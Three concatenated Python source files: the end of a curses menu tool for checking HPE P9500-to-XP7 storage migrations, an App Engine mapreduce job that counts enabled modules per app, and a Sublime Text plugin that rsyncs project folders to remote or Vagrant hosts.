self.window.addstr(1,2,line)
curses.echo()
self.window.refresh()
curses.doupdate()
self.reply = self.window.getstr()
### after we received the response ###
self.update_object.set(self.reply)
self.window.clear()
self.panel.hide()
panel.update_panels()
curses.noecho()
curses.doupdate()
class Selection(object):
def __init__(self,window,title,stdscr):
self.window = window
self.heigth,self.width = self.window.getmaxyx()
self.title = title
self.selection = []
def display(self):
self.window.clear()
line = "{} : {}".format(self.title, ",".join(["{}-{}".format(x[0],x[1]) for x in self.selection]))
if len(line) >= self.width:
line = line[:self.width-1]
self.window.addstr(1,2,line)
self.window.border()
self.window.refresh()
curses.doupdate()
def add(self,item):
current_set = set(self.selection)
current_set.add(item)
self.selection = list(sorted(current_set))
self.display()
def clear(self):
del self.selection[:]
self.display()
def get(self):
return self.selection
class Search(object):
def __init__(self,window,title,stdscr):
self.window = window
self.heigth,self.width = self.window.getmaxyx()
self.title = title
self.search_str = ""
def display(self):
self.window.clear()
line = "{}: {}".format(self.title,self.search_str)
if len(line) >= self.width:
line = line[:self.width-1]
self.window.addstr(1,2,line)
self.window.border()
self.window.refresh()
curses.doupdate()
def set(self,search_str):
self.search_str = search_str
self.display()
def clear(self):
self.search_str = ""
self.display()
def get(self):
return self.search_str
class Consistent(object):
def __init__(self,window,title,stdscr):
self.window = window
self.heigth,self.width = self.window.getmaxyx()
self.title = title
self.consistent = []
def display(self):
self.window.clear()
line = "{}: {}".format(self.title,",".join(["{}-{}".format(x[0],x[1]) for x in self.consistent]))
if len(line) >= self.width:
line = line[:self.width-1]
self.window.addstr(1,2,line)
self.window.border()
self.window.refresh()
curses.doupdate()
def add(self,item):
current_set = set(self.consistent)
current_set.add(item)
self.consistent = list(sorted(current_set))
self.display()
def clear(self):
del self.consistent[:]
self.display()
def get(self):
return self.consistent
class ShowSummaryMenu(object):
def __init__(self,window,selection,stdscr):
self.window = window
self.heigth,self.width = self.window.getmaxyx()
self.selection = selection
self.hostgroup_summary = []
self.window.keypad(1)
self.panel = panel.new_panel(self.window)
self.panel.hide()
panel.update_panels()
self.display_list = []
def navigate(self,n):
if n < 0:
if self.slice_start >= 1:
self.slice_start += n
if self.slice_start < 0:
self.slice_start = 0
self.slice_end = self.slice_start + self.slice_len
elif n > 0:
if self.slice_end < len(self.display_list) - 1:
self.slice_end += n
if self.slice_end > len(self.display_list) - 1:
self.slice_end = len(self.display_list) - 1
self.slice_start = self.slice_end - self.slice_len
def display(self):
self.panel.top()
self.panel.show()
self.window.clear()
self.heigth,self.width = self.window.getmaxyx()
### fill the list to display ###
self.display_list = []
for box_name,hostgroup_name in self.selection.get():
self.display_list.extend(box_dict[box_name].get_hostgroup_noluns(hostgroup_name))
### now we know what to display ###
self.slice_start = 0
self.slice_len = min(len(self.display_list),self.heigth-6)
self.slice_end = self.slice_start + self.slice_len
while True:
self.window.clear()
self.window.refresh()
curses.doupdate()
for index,item in enumerate(self.display_list):
if len(item) >= self.width:
item = item[:self.width-1]
if self.slice_start <= index <= self.slice_end:
self.window.addstr(1+(index-self.slice_start),2,item,curses.A_NORMAL)
key = self.window.getch()
if key in [curses.KEY_ENTER,ord("\n"),ord("B"),ord("b")]:
break
elif key == curses.KEY_UP:
self.navigate(-1)
elif key == curses.KEY_DOWN:
self.navigate(1)
elif key == curses.KEY_PPAGE:
self.navigate(-10)
elif key == curses.KEY_NPAGE:
self.navigate(10)
self.window.clear()
self.panel.hide()
panel.update_panels()
curses.doupdate()
class ShowConsistencyMenu(object):
def __init__(self,window,selection,consistent,stdscr):
self.window = window
self.selection = selection
self.window.keypad(1)
self.panel = panel.new_panel(self.window)
self.panel.hide()
panel.update_panels()
self.display_list = []
self.consistent = consistent
def navigate(self,n):
if n < 0:
if self.slice_start >= 1:
self.slice_start += n
if self.slice_start < 0:
self.slice_start = 0
self.slice_end = self.slice_start + self.slice_len
elif n > 0:
if self.slice_end < len(self.display_list) - 1:
self.slice_end += n
if self.slice_end > len(self.display_list) - 1:
self.slice_end = len(self.display_list) - 1
self.slice_start = self.slice_end - self.slice_len
def display(self):
self.panel.top()
self.panel.show()
self.window.clear()
self.heigth,self.width = self.window.getmaxyx()
### fill the list to display ###
self.display_list = []
for box_name,hostgroup_name in self.selection.get():
if box_dict[box_name].test_hostgroup_exists(hostgroup_name):
### TODO: add CA check ###
result,report = box_dict[box_name].get_hostgroup_consistency(hostgroup_name)
self.display_list.extend(report)
if result:
self.consistent.add((box_name,hostgroup_name))
logger.info("{}-{} added to consistent hostgroup list during consistency check".format(box_name,hostgroup_name))
else:
logger.error("{}-{} not added to consistent hostgroup list during consistency check".format(box_name,hostgroup_name))
else:
logger.debug("{}-{} does not exists".format(box_name,hostgroup_name))
### now we know what to display ###
self.slice_start = 0
self.slice_len = min(len(self.display_list),self.heigth-6)
self.slice_end = self.slice_start + self.slice_len
while True:
self.window.clear()
self.window.refresh()
curses.doupdate()
for index,item in enumerate(self.display_list):
if len(item) >= self.width:
item = item[:self.width-1]
if self.slice_start <= index <= self.slice_end:
self.window.addstr(1+(index-self.slice_start),2,item,curses.A_NORMAL)
key = self.window.getch()
if key in [curses.KEY_ENTER,ord("\n"),ord("B"),ord("b")]:
break
elif key == curses.KEY_UP:
self.navigate(-1)
elif key == curses.KEY_DOWN:
self.navigate(1)
elif key == curses.KEY_PPAGE:
self.navigate(-10)
elif key == curses.KEY_NPAGE:
self.navigate(10)
self.window.clear()
self.panel.hide()
panel.update_panels()
curses.doupdate()
class ShowWriteProvisionMenu(object):
def __init__(self,window,consistent,map_dir,stdscr):
self.window = window
self.consistent = consistent
self.map_dir = map_dir
self.window.keypad(1)
self.panel = panel.new_panel(self.window)
self.panel.hide()
panel.update_panels()
def display(self):
self.panel.top()
self.panel.show()
self.window.clear()
self.window.addstr(1,2,"Write provisioning out to file for the consistent HOSTGROUPs ? (Y/n)")
key = self.window.getch()
if key in [curses.KEY_ENTER,ord("\n"),ord("Y"),ord("y")]:
### write out the ldevs to file ###
for box_name,hostgroup_name in self.consistent.get():
if box_dict[box_name].test_hostgroup_exists(hostgroup_name):
sf = os.path.join(self.map_dir,"{}_{}.prov".format(box_name,hostgroup_name))
with open(sf,"wt") as sfh:
box_dict[box_name].print_provisioning(hostgroup_name,sfh)
self.window.addstr(2,2,"Written..")
else:
self.window.addstr(2,2,"Cancelled..")
self.window.clear()
self.panel.hide()
panel.update_panels()
curses.doupdate()
class Select_Menu(object):
def __init__(self,window,items,selection,search,stdscr):
self.window = window
self.heigth,self.width = self.window.getmaxyx()
### items is a dict ###
self.items = items
self.filtered_items = copy.copy(self.items.keys())
self.filtered_items.append("exit")
### slice is a view on the items which fits in the window ###
self.slice_start = 0
self.slice_len = min(len(self.filtered_items)-1,self.heigth-6)
self.slice_end = self.slice_start + self.slice_len
self.window.keypad(1)
self.panel = panel.new_panel(self.window)
self.panel.hide()
panel.update_panels()
self.position = 0
self.selection = selection
self.search = search
def update(self):
"""
update the selection items list to match the new search criteria
"""
if self.search.get() != "":
logger.debug("Select_Menu.update :: update items to match search str {}".format(self.search.get()))
self.filtered_items = [x for x in self.items.keys() if re.search(self.search.get(),x,flags=re.IGNORECASE)]
else:
logger.debug("Select_Menu.update :: update items to match search all")
self.filtered_items = copy.copy(self.items.keys())
self.filtered_items.append("exit")
self.slice_start = 0
self.slice_end = self.slice_start + self.slice_len
self.position = 0
def navigate(self,n):
self.position += n
if self.position < 0:
self.position = 0
elif self.position >= len(self.filtered_items):
self.position = len(self.filtered_items) - 1
logger.debug("Select_Menu.navigate :: position = {}, n = {}".format(self.position,n ))
### adjust slice ###
if n < 0:
if self.position - self.slice_start < 2 and self.slice_start >= 1:
### slide slice up ###
self.slice_start += n
if self.slice_start < 0:
self.slice_start = 0
self.slice_end = self.slice_start + self.slice_len
logger.debug("Select_Menu.navigate :: slide slice up to {}-{}".format(self.slice_start,self.slice_end ))
elif n > 0:
if self.slice_end - self.position < 2 and self.slice_end < len(self.filtered_items) - 1:
### slide slice down ###
self.slice_end += n
if self.slice_end > len(self.filtered_items) - 1:
self.slice_end = len(self.filtered_items) - 1
self.slice_start = self.slice_end - self.slice_len
logger.debug("Select_Menu.navigate :: slide slice down to {}-{}".format(self.slice_start,self.slice_end ))
def display(self):
self.panel.top()
self.panel.show()
self.window.clear()
self.update()
while True:
self.window.clear()
self.window.refresh()
curses.doupdate()
for index,item in enumerate(self.filtered_items):
if index == self.position:
mode = curses.A_STANDOUT
else:
mode = curses.A_NORMAL
# line = "{}: {}".format(index,item)
line = "{}".format(item)
if len(line) >= self.width:
line = line[:self.width-1]
### only add lines in the slice ###
# logger.debug("SelectMenu.display :: about to addstr line {}".format(line))
if self.slice_start <= index <= self.slice_end:
# logger.debug("SelectMenu.display :: index in slice {} - {}, executing addstr".format(self.slice_start,self.slice_end))
self.window.addstr(1+(index-self.slice_start),2,line,mode)
key = self.window.getch()
if key in [ord("b"),ord("B")]:
break
elif key in [curses.KEY_ENTER,ord("\n")]:
if self.position == len(self.filtered_items) - 1:
break
else:
# self.items = {"select_str":[(boxpair_name,hostgroup_name),...]}
# self.selection.add(self.items[self.filtered_items[self.position]])
for add_item in self.items[self.filtered_items[self.position]]:
self.selection.add(add_item)
elif key == curses.KEY_UP:
self.navigate(-1)
elif key == curses.KEY_DOWN:
self.navigate(1)
elif key == curses.KEY_PPAGE:
self.navigate(-10)
elif key == curses.KEY_NPAGE:
self.navigate(10)
self.window.clear()
self.panel.hide()
panel.update_panels()
curses.doupdate()
class Select_XPinfo(object):
def __init__(self,window,selection,xpinfo_dir,stdscr):
self.window = window
self.heigth,self.width = self.window.getmaxyx()
self.xpinfo_file_list =[]
self.slice_start = 0
self.slice_len = 0
self.slice_end = 0
self.window.keypad(1)
self.panel = panel.new_panel(self.window)
self.panel.hide()
panel.update_panels()
self.position = 0
self.xpinfo_dir = xpinfo_dir
self.selection = selection
def update(self):
"""
update the list of xpinfo files present
"""
if os.path.exists(self.xpinfo_dir):
del(self.xpinfo_file_list[:])
self.xpinfo_file_list = [f for f in os.listdir(self.xpinfo_dir) if os.path.isfile("{}/{}".format(self.xpinfo_dir,f)) and re.match(".+\.xpinfo$",f,flags=re.IGNORECASE)]
self.xpinfo_file_list.append("exit")
self.slice_len = min(len(self.xpinfo_file_list)-1, self.heigth - 6)
self.slice_start = 0
self.slice_end = self.slice_start + self.slice_len
self.position = 0
def navigate(self,n):
self.position += n
if self.position < 0:
self.position = 0
elif self.position >= len(self.xpinfo_file_list):
self.position = len(self.xpinfo_file_list) - 1
if n < 0:
if self.position - self.slice_start < 2 and self.slice_start >= 1:
### slide slice up ###
self.slice_start += n
if self.slice_start < 0:
self.slice_start = 0
self.slice_end = self.slice_start + self.slice_len
elif n > 0:
if self.slice_end - self.position < 2 and self.slice_end < len(self.xpinfo_file_list) - 1:
### slide slice down ###
self.slice_end += n
if self.slice_end > len(self.xpinfo_file_list) - 1:
self.slice_end = len(self.xpinfo_file_list) - 1
self.slice_start = self.slice_end - self.slice_len
def display(self):
self.panel.top()
self.panel.show()
self.window.clear()
self.update()
while True:
self.window.clear()
self.window.refresh()
curses.doupdate()
### show the list of xpinfo files ###
for index,item in enumerate(self.xpinfo_file_list):
if index == self.position:
mode = curses.A_STANDOUT
else:
mode = curses.A_NORMAL
line = "{}".format(item)
if len(line) >= self.width:
line = line[:self.width-1]
### only add lines in the slice ###
if self.slice_start <= index <= self.slice_end:
self.window.addstr(1+(index-self.slice_start),2,line,mode)
key = self.window.getch()
if key in [ord("b"),ord("B")]:
break
elif key in [curses.KEY_ENTER,ord("\n")]:
if self.position == len(self.xpinfo_file_list) - 1:
break
else:
logger.debug("XPINFO: start processing {}".format(self.xpinfo_file_list[self.position]))
serial_nbr_set = set(serialnbr_dict.values())
ldev_dict = {}
hostgroup_dict = {}
for serial_nbr in serial_nbr_set:
ldev_dict[serial_nbr] = set()
### process the selected xpinfo file ###
with open("{}/{}".format(self.xpinfo_dir,self.xpinfo_file_list[self.position]),"rt") as f:
xpinfo_file_reader = csv.reader(f,delimiter=",",quotechar="'")
for row in xpinfo_file_reader:
if len(row) > 8:
hostname = row[0]
device_name = row[1]
ldev_nbr = xp7.standard_format_ldev(row[5])
serial_nbr = int(row[8])
logger.debug("XPINFO: got S/N {} LDEV {} from xpinfo file".format(serial_nbr,ldev_nbr))
if serial_nbr in ldev_dict:
ldev_dict[serial_nbr].add(ldev_nbr)
logger.debug("XPINFO: known S/N, added to ldev_dict, now at {} elements".format(len(ldev_dict[serial_nbr])))
else:
logger.error("XPINFO: line too short to be valid, skipping {}".format(row))
### translate ldev to hostgroup ###
for serial_nbr in ldev_dict:
box_name = serial_to_name_dict[serial_nbr]
if not box_name in hostgroup_dict:
hostgroup_dict[box_name] = set()
for ldev_nbr in ldev_dict[serial_nbr]:
for hostgroup_name in box_dict[box_name].get_ldev_hostgroups(ldev_nbr):
hostgroup_dict[box_name].add(hostgroup_name)
### add found hostgroups to the selection ###
for box_name in hostgroup_dict:
for hostgroup_name in hostgroup_dict[box_name]:
logger.debug("XPINFO processing: adding {}-{} to the selection".format(box_name,hostgroup_name))
self.selection.add((box_name,hostgroup_name))
elif key == curses.KEY_UP:
self.navigate(-1)
elif key == curses.KEY_DOWN:
self.navigate(1)
elif key == curses.KEY_PPAGE:
self.navigate(-10)
elif key == curses.KEY_NPAGE:
self.navigate(10)
self.window.clear()
self.panel.hide()
panel.update_panels()
curses.doupdate()
####################################################################################################
### MAIN
####################################################################################################
def main(stdscr):
### clear screen ###
stdscr.clear()
### check window heigth and width ###
if curses.COLS < 20 or curses.LINES < 20:
sys.stderr.write("Window not large enough, exiting ..\n")
sys.exit(1)
### define title_win ###
title_win = stdscr.subwin(3,curses.COLS,0,0)
title_win.addstr(1,2,"HPE P9500 TO XP7 MIGRATION PRE-CHECK")
title_win.border()
### define search_win ###
search_win = stdscr.subwin(3,curses.COLS,curses.LINES-10,0)
search = Search(search_win,"Display HOSTGROUPS matching this SEARCH expression",stdscr)
search.display()
### define selection_win ###
select_win = stdscr.subwin(3,curses.COLS,curses.LINES-7,0)
selection = Selection(select_win,"SELECTED HOSTGROUP(s)",stdscr)
selection.display()
### define consistent_win ###
consistent_win = stdscr.subwin(3,curses.COLS,curses.LINES-4,0)
consistent = Consistent(consistent_win,"CONSISTENT HOSTGROUP(s)",stdscr)
consistent.display()
### define key_win ###
key_win = stdscr.subwin(1,curses.COLS,curses.LINES-1,0)
#key_win.clear()
#key_win.refresh()
#curses.doupdate()
key_win.addstr(0,2,"<ARROW-UP or PAGE-UP> SCROLL UP <ARROW-DOWN or PAGE-DOWN> SCROLL DOWN <B> BACK",curses.A_BOLD)
### define menu_win ###
menu_win = stdscr.subwin(curses.LINES-13,curses.COLS,3,0)
# menu_win.border()
main_menu_items = []
input_search = InputMenu(menu_win,"Specify new search string",search,stdscr)
main_menu_items.append(("Set SEARCH string",input_search.display))
main_menu_items.append(("Clear SEARCH string",search.clear))
### select hostgroups by box ###
for boxpair_name in sorted(boxpair_dict.keys()):
select_item_dict = {}
for box_name in boxpair_dict[boxpair_name]:
hostgroup_name_list = box_dict[box_name].get_hostgroups()
for hostgroup_name in hostgroup_name_list:
if hostgroup_name not in select_item_dict:
select_item_dict[hostgroup_name] = set()
select_item_dict[hostgroup_name].add((box_name,hostgroup_name))
hg_by_box_menu = Select_Menu(menu_win,select_item_dict,selection,search,stdscr)
main_menu_items.append(("Select {} HOSTGROUP".format(boxpair_name),hg_by_box_menu.display))
### select hostgroups by host (hba_wwn) ###
select_item_dict = {}
for boxpair_name in sorted(boxpair_dict.keys()):
for box_name in boxpair_dict[boxpair_name]:
hostgroup_name_list = box_dict[box_name].get_hostgroups()
for hostgroup_name in hostgroup_name_list:
hba_wwn_list = box_dict[box_name].get_hostgroup_hba_wwns(hostgroup_name)
for hba_wwn in hba_wwn_list:
if len(hba_wwn.nickname.split("_")) > 1:
sel_item = hba_wwn.nickname.split("_")[0]
else:
sel_item = hba_wwn.nickname
if "{}-{}".format(box_name,sel_item) not in select_item_dict:
select_item_dict["{}-{}".format(box_name,sel_item)] = set()
select_item_dict["{}-{}".format(box_name,sel_item)].add((box_name,hostgroup_name))
hg_by_host_menu = Select_Menu(menu_win,select_item_dict,selection,search,stdscr)
main_menu_items.append(("Select by HOSTNAME",hg_by_host_menu.display))
### select hostgroups by name ###
select_item_dict = {}
for boxpair_name in sorted(boxpair_dict.keys()):
for box_name in boxpair_dict[boxpair_name]:
hostgroup_name_list = box_dict[box_name].get_hostgroups()
for hostgroup_name in hostgroup_name_list:
if hostgroup_name not in select_item_dict:
select_item_dict[hostgroup_name] = set()
select_item_dict[hostgroup_name].add((box_name,hostgroup_name))
hg_by_name_menu = Select_Menu(menu_win,select_item_dict,selection,search,stdscr)
main_menu_items.append(("Select by HOSTGROUP",hg_by_name_menu.display))
### read XPINFO file ###
xpinfo_menu = Select_XPinfo(menu_win,selection,xpinfo_dir,stdscr)
main_menu_items.append(("Read XPINFO file",xpinfo_menu.display))
### show hostgroup summary menu ###
hostgroup_summary = ShowSummaryMenu(menu_win,selection,stdscr)
main_menu_items.append(("Show HOSTGROUPs summary",hostgroup_summary.display))
### show hostgroup consistency menu ###
hostgroup_consistency = ShowConsistencyMenu(menu_win,selection,consistent,stdscr)
main_menu_items.append(("Show HOSTGROUPs consistency check results",hostgroup_consistency.display))
main_menu_items.append(("Clear HOSTGROUP selection",selection.clear))
main_menu_items.append(("Clear consistent HOSTGROUP",consistent.clear))
write_prov = ShowWriteProvisionMenu(menu_win,consistent,map_dir,stdscr)
main_menu_items.append(("Write PROVISION file",write_prov.display))
main_menu = Menu(menu_win,main_menu_items,stdscr)
main_menu.display()
### refresh & wait ###
stdscr.refresh()
stdscr.getkey()
####################
### parse config ###
####################
configfile = "xpmig.ini"
cfg = ConfigParser()
cfg.read(configfile)
for mandatory_section in ("boxpair","serialnbr","instance","site","collect","dir"):
if not cfg.has_section(mandatory_section):
sys.stderr("{} section missing in config file {}, exiting..".format(mandatory_section,configfile))
sys.exit(1)
for name,value in cfg.items("boxpair"):
boxpair_dict[name.upper()] = value.split(",")
for name,value in cfg.items("serialnbr"):
serialnbr_dict[name.upper()] = int(value)
for name,value in cfg.items("instance"):
instance_dict[name.upper()] = int(value)
for name,value in cfg.items("site"):
site_dict[name.upper()] = value
for name,value in cfg.items("collect"):
collectfile_dict[name.upper()] = value
try:
log_level = cfg.getint("log","level")
except:
log_level = 30
try:
log_size = cfg.getint("log","maxsize")
except:
log_size = 100000000
try:
log_versions = cfg.getint("log","maxversions")
except:
log_versions = 5
try:
log_dir = cfg.get("dir","log")
except:
sys.stderr.write("log file dir not defined, exiting..\n")
sys.exit(1)
try:
xpinfo_dir = cfg.get("dir","xpinfo")
except:
sys.stderr.write("xpinfo file dir not defined, exiting..\n")
sys.exit(1)
try:
collect_dir = cfg.get("dir","collect")
except:
sys.stderr.write("collect file dir not defined, exiting..\n")
sys.exit(1)
try:
map_dir = cfg.get("dir","map")
except:
sys.stderr.write("map file dir not defined, exiting..\n")
sys.exit(1)
serial_to_name_dict = {}
for box_name,serial_nbr in serialnbr_dict.items():
serial_to_name_dict[serial_nbr] = box_name
#####################
### start logging ###
#####################
logfile = os.path.join(log_dir,"xpmig_precheck.log")
logger = logging.getLogger("xpmig_precheck")
logger.setLevel(log_level)
fh = logging.handlers.RotatingFileHandler(logfile,maxBytes=log_size,backupCount=log_versions)
formatter = logging.Formatter("%(asctime)s %(levelname)s %(message)s","%Y/%m/%d-%H:%M:%S")
fh.setFormatter(formatter)
logger.addHandler(fh)
logger.info("#" * linelen)
logger.info("XPMIG PRECHECK started")
logger.info("#" * linelen)
logger.info("Configuration settings :")
logger.info("BOXPAIR :")
logger.info(boxpair_dict)
logger.info("SERIAL NBRs:")
logger.info(serialnbr_dict)
logger.info("INSTANCE NBRs:")
logger.info(instance_dict)
logger.info("SITE NBRs:")
logger.info(site_dict)
logger.info("COLLECT FILEs:")
logger.info(collectfile_dict)
logger.info("XPINFO dir: {}".format(xpinfo_dir))
#########################
### instantiate boxes ###
#########################
for box_name in collectfile_dict:
collect_file = os.path.join(collect_dir,collectfile_dict[box_name])
if box_name in instance_dict:
instance_nbr = instance_dict[box_name]
else:
err_msg = "No HORCM instance nbr defined for box {}, exiting..".format(box_name)
logger.error(err_msg)
sys.stderr(err_msg + "\n")
sys.exit(1)
if box_name in serialnbr_dict:
serial_nbr = serialnbr_dict[box_name]
else:
err_msg = "No serial nbr defined for box {}, exiting..".format(box_name)
logger.error(err_msg)
sys.stderr(err_msg + "\n")
sys.exit(1)
if box_name in site_dict:
site = site_dict[box_name]
else:
err_msg = "No site defined for box {}, exiting..".format(box_name)
logger.error(err_msg)
sys.stderr(err_msg + "\n")
sys.exit(1)
box_dict[box_name] = xp7.XP7(box_name,instance_nbr,serial_nbr,site,collect_file)
logger.info("XP7 object created for box {} :".format(box_name))
logger.info(box_dict[box_name])
#####################
### start menu ###
#####################
curses.wrapper(main)
logger.info("#" * linelen)
logger.info("XPMIG PRECHECK ended")
logger.info("#" * linelen) | 1.78125 | 2 |
src/solutions/common/job/module_statistics.py | goubertbrent/oca-backend | 0 | 12794286 | <filename>src/solutions/common/job/module_statistics.py
# -*- coding: utf-8 -*-
# Copyright 2020 Green Valley Belgium NV
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# @@license_version:1.7@@
import datetime
import json
import logging
import time
import cloudstorage
from mapreduce import mapreduce_pipeline
from pipeline import pipeline
from pipeline.common import List
from rogerthat.consts import STATS_QUEUE, DEBUG, PIPELINE_BUCKET
from rogerthat.dal.service import get_service_identities
from rogerthat.settings import get_server_settings
from rogerthat.utils import guid, log_offload
def start_job():
current_date = datetime.datetime.now()
key = 'module_stats_%s_%s' % (current_date.strftime('%Y-%m-%d'), guid())
counter = ModuleStatsPipeline(PIPELINE_BUCKET, key, time.mktime(current_date.timetuple()))
task = counter.start(idempotence_key=key, return_task=True)
task.add(queue_name=STATS_QUEUE)
redirect_url = '%s/status?root=%s' % (counter.base_path, counter.pipeline_id)
logging.info('ModuleStats pipeline url: %s', redirect_url)
return get_server_settings().baseUrl + redirect_url
def mapper(sln_settings):
# type: (SolutionSettings) -> GeneratorType
for service_identity in get_service_identities(sln_settings.service_user):
yield service_identity.app_id, str(sln_settings.modules)
def _combine(new_values, previous_combined_values):
# type: (list[list[str]], list[dict[str, int]]) -> dict[str, int]
combined = {}
for stats in previous_combined_values:
for module, count in stats.iteritems():
if module not in combined:
combined[module] = count
else:
combined[module] += count
for v in new_values:
# mapper returns a string
modules = eval(v) if isinstance(v, basestring) else v
for module in modules:
if module not in combined:
combined[module] = 1
else:
combined[module] += 1
return combined
def combiner(key, new_values, previously_combined_values):
# type: (str, list[list[str]], list[dict[str, int]]) -> GeneratorType
if DEBUG:
logging.debug('combiner %s new_values: %s', key, new_values)
logging.debug('combiner %s previously_combined_values: %s', key, previously_combined_values)
combined = _combine(new_values, previously_combined_values)
if DEBUG:
logging.debug('combiner %s combined: %s', key, combined)
yield combined
def reducer(app_id, values):
# type: (str, list[dict[str, int]]) -> GeneratorType
if DEBUG:
logging.info('reducer values: %s', values)
combined = _combine([], values)
json_line = json.dumps({'app_id': app_id, 'stats': combined})
if DEBUG:
logging.debug('reducer %s: %s', app_id, json_line)
yield '%s\n' % json_line
class ModuleStatsPipeline(pipeline.Pipeline):
def run(self, bucket_name, key, current_date):
# type: (str, str, long) -> GeneratorType
params = {
'mapper_spec': 'solutions.common.job.module_statistics.mapper',
'mapper_params': {
'bucket_name': bucket_name,
'entity_kind': 'solutions.common.models.SolutionSettings',
'filters': []
},
'combiner_spec': 'solutions.common.job.module_statistics.combiner',
'reducer_spec': 'solutions.common.job.module_statistics.reducer',
'reducer_params': {
'output_writer': {
'bucket_name': bucket_name
}
},
'input_reader_spec': 'mapreduce.input_readers.DatastoreInputReader',
'output_writer_spec': 'mapreduce.output_writers.GoogleCloudStorageConsistentOutputWriter',
'shards': 2 if DEBUG else 10
}
output = yield mapreduce_pipeline.MapreducePipeline(key, **params)
process_output_pipeline = yield ProcessOutputPipeline(output, current_date)
with pipeline.After(process_output_pipeline):
yield CleanupGoogleCloudStorageFiles(output)
def finalized(self):
if self.was_aborted:
logging.error('%s was aborted', self, _suppress=False)
return
logging.info('%s was finished', self)
class ProcessOutputPipeline(pipeline.Pipeline):
def run(self, output, current_date):
results = []
for filename in output:
results.append((yield ProcessFilePipeline(filename)))
yield List(*results)
def finalized(self):
if DEBUG:
logging.debug('ProcessOutputPipeline: self.outputs.default.value = %s', self.outputs.default.value)
_, timestamp = self.args
# list of dicts with key app_id, value dict of module, amount
outputs = self.outputs.default.value # type: list[dict[int, int]]
for output in outputs:
log_offload.create_log(None, 'oca.active_modules', output, None, timestamp=timestamp)
class ProcessFilePipeline(pipeline.Pipeline):
def run(self, filename):
stats_per_app = {}
with cloudstorage.open(filename, "r") as f:
for json_line in f:
d = json.loads(json_line)
stats_per_app[d['app_id']] = d['stats']
if DEBUG:
logging.debug('ProcessFilePipeline: %s', stats_per_app)
return stats_per_app
class CleanupGoogleCloudStorageFiles(pipeline.Pipeline):
def run(self, output):
for filename in output:
cloudstorage.delete(filename)
| 1.6875 | 2 |
commands.py | devaos/sublime-remote | 2 | 12794287 | <reponame>devaos/sublime-remote<gh_stars>1-10
# -*- coding: utf-8 -*-
#
# Copyright (c) 2014 <NAME>
# http://github.com/devaos/sublime-remote/blob/master/LICENSE
"""This module implements the Sublime Text 3 commands provided by remote."""
import os
import re
import sys
import sublime
import sublime_plugin
import subprocess
import threading
sys.path.append(os.path.dirname(os.path.abspath(__file__)))
import remote.sublime_api as sublime_api
import remote.sync_api as sync_api
import remote.vagrant_api as vagrant_api
# =============================================================================
class RsyncOptionsCommand(sublime_plugin.TextCommand):
"""Override default rsync options for Remote."""
def run(self, edit, paths):
sublime.set_timeout_async(lambda: rsync_options(paths[0], None), 0)
def rsync_options(path, callback):
print("Local path", path)
w = sublime.active_window()
def done_with_options(userInput):
print("Options", userInput)
if len(userInput) == 0:
do_it(sync_api.default_rsync_options())
return True
do_it(userInput)
return True
def do_it(rsyncOptions):
settings = {"rsyncOptions": rsyncOptions}
sublime_api.update_project_settings(w, path, settings)
if callback is not None:
callback(settings)
options = sync_api.default_rsync_options()
found = sublime_api.project_by_path(w, path)
if found is not None and found["rsyncOptions"] != "":
options = found["rsyncOptions"]
sublime_api.show_input_panel("Use these rsync options:",
options, done_with_options, None, None)
# =============================================================================
class AddRemoteCommand(sublime_plugin.TextCommand):
"""Map a new remote path to a local project path."""
def run(self, edit, paths):
sublime.set_timeout_async(lambda: add_remote_async(paths[0], None), 0)
def add_remote_async(path, callback):
print("Local path", path)
w = sublime.active_window()
def done_with_folder(userInput):
print("Remote path", userInput)
if len(userInput) == 0:
do_it("", "")
return True
parts = userInput.split(":")
if len(parts) != 2:
sublime_api.error_message("The remote path you entered does not" +
" appear to contain a host")
return False
more = parts[0].split("@")
host = ""
if len(more) > 2:
sublime_api.error_message("Unable to parse the remote path you" +
" entered")
return False
elif len(more) == 2:
host = more[1]
else:
host = more[0]
if host == "vagrant":
vms = ["Select VM below...", "---"]
vagrant_api.get_vm_list(vms)
if len(vms) == 2:
sublime_api.error_message("No vagrant VMs found")
return False
if len(vms) == 3:
done_with_vm(userInput, vms, 2)
else:
sublime_api.show_quick_panel(vms,
lambda i=-1:
done_with_vm(userInput, vms, i))
else:
do_it(userInput, "")
return True
def done_with_vm(remotePath, vms, userSelection):
if userSelection == -1:
return False
vm = vagrant_api.parse_vm_id(vms[userSelection])
if vm is None:
return False
print("VM selected", vm)
sshOptions = vagrant_api.get_ssh_options(vm)
print("ssh options", sshOptions)
if sshOptions != "":
do_it(remotePath, sshOptions)
def do_it(remotePath, sshOptions):
settings = {"remotePath": remotePath, "remoteOptions": sshOptions}
sublime_api.update_project_settings(w, path, settings)
if callback is not None:
callback(settings)
remotePath = ""
found = sublime_api.project_by_path(w, path)
if found is not None and found["remotePath"] != "":
remotePath = found["remotePath"]
sublime_api.show_input_panel("Sync this folder to remote folder:",
remotePath, done_with_folder, None, None)
# =============================================================================
class FromRemote(sublime_plugin.TextCommand):
"""Sync a local directory from a remote directory."""
def run(self, edit, paths):
sublime.set_timeout_async(lambda: from_remote_async(paths[0]), 0)
def from_remote_async(path):
print("From local path", path)
w = sublime.active_window()
found = sublime_api.project_by_path(w, path)
if found is None or found["remotePath"] == "":
add_remote_async(path, lambda o: sync_api.rsync_remote(
o.get("remotePath", ""), path,
o.get("remoteOptions", ""),
o.get("rsyncOptions", "")))
return True
return sync_api.rsync_remote(found.get("remotePath", ""),
found.get("path", ""),
found.get("remoteOptions", ""),
found.get("rsyncOptions", ""))
# =============================================================================
class ToRemote(sublime_plugin.TextCommand):
"""Sync a local directory to a remote directory."""
def run(self, edit, paths):
sublime.set_timeout_async(lambda: to_remote_async(paths[0]), 0)
def to_remote_async(path):
print("To local path", path)
w = sublime.active_window()
found = sublime_api.project_by_path(w, path)
if found is None or found["remotePath"] == "":
add_remote_async(path, lambda o: sync_api.rsync_remote(path,
o.get("remotePath", ""),
o.get("remoteOptions", ""),
o.get("rsyncOptions", "")))
return True
return sync_api.rsync_remote(found.get("path", ""),
found.get("remotePath", ""),
found.get("remoteOptions", ""),
found.get("rsyncOptions", ""))
# =============================================================================
class RemoteEdit(sublime_plugin.EventListener):
"""Sync a local change out."""
def on_post_save_async(self, view):
filename = view.file_name()
